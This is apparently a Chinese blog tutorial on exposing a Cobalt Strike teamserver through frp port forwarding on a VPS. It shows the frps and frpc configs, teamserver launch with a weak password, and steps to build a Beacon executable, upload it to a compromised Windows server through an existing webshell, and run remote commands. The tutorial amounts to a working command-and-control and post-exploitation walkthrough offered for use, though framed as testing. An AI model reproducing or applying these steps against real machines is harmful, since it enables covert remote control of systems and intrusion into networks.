CS使用frp实现内网穿透

跳板机(vps):124.220.93.x
攻击机 kali:192.168.8.8 ,主要架设CS,启动 CS
靶机:windows server 2012:124.222.180.x,也就是拿到WebShell的机器
在这里插入图片描述

1. vps 服务端frps.ini配置

在这里插入图片描述

[common]
bind_port = 7000

#以下可不要
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin
enable_prometheus = true

启动服务端

在这里插入图片描述

2. kali 客户端frpc.ini配置(攻击机)

在这里插入图片描述

[common]
server_addr = 124.220.93.149
server_port = 7000
 
[CS_Server_9050]
type = tcp
local_ip = 192.168.8.8
local_port = 50050
remote_port = 9050
 
[test_Beacon_9080]
type = tcp
local_ip = 192.168.8.8
local_port = 9080
remote_port = 9080

启动客户端

在这里插入图片描述
当运行成功之后,云服务器端(vps)会显示建立连接
在这里插入图片描述

3. cobaltstrike

cs 服务端

sudo ./teamserver 192.168.8.8 123

在这里插入图片描述
在这里可以看到端口是50050,此时的端口要和上面的frpc.ini中端口对应
因为这个端口的流量转发给了Linux的9050端口

cs 客户端

这里需要使用vps的ip和端口(9050)来操作

./cobaltstrike

在这里插入图片描述
在这里插入图片描述
当连接建立成功之后,frp服务端会有反应
在这里插入图片描述
此时成功将内网的CS使用frp进行了穿透
接下来就是攻击测试了

4. 设置监听

在这里插入图片描述
设置完成后点击保存
完成后如下:
在这里插入图片描述

5. 上线测试

attack生成攻击exe
在这里插入图片描述
选择监听器
在这里插入图片描述
点击生成
在这里插入图片描述
保存生成好的exe
在这里插入图片描述
上传到获取webshell的靶机(被攻击的机器)
在这里插入图片描述
运行
在这里插入图片描述
在cs客户端查看,发现成功上线(鼓掌😎)
在这里插入图片描述
在这里插入图片描述

此时vps服务端也会收到上线后的消息
在这里插入图片描述
执行操作
在这里插入图片描述

shell ipconfig

在这里插入图片描述

shell whoami

在这里插入图片描述

  • 8
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值